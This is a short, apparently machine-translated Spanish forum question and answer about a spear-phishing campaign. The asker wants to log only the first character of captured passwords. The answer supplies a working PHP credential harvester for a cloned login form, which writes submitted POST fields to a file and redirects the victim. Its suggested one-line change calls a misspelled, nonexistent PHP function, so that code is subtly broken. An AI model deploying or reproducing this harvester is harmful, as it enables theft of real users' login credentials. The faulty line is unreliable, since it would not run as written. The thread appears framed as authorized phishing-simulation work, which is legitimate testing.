Estoy lanzando una campaña de spear phishing y mi cliente me ha pedido específicamente que solo elimine el primer carácter de la contraseña, ¿hay alguna manera de hacerlo?
Básicamente, en lugar de mostrar la contraseña completa cuando un usuario ingresa la suya, quiero que solo aparezca el primer carácter.
De lo contrario, ¿es posible producir un hash cuando la contraseña se envía al servidor de apache?
Si está usando la opción en la que estoy pensando, su formulario clonado está POSTing to post.php. Puedes editar ese script para que haga lo que quieres.
<?php
$file = 'harvester_sdfskksdks.txt';
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
<meta http-equiv="refresh" content="0; url=http://0.0.0.0:8000/index.html" />
En lugar de escribir todas las var. $ _POST, simplemente hazlo
file_puts_content($file, $_POST['login'] . ':' . substr($_POST['password'], 0, 1), FILE_APPEND)
Lea otras preguntas en las etiquetas passwords hash kali-linux metasploit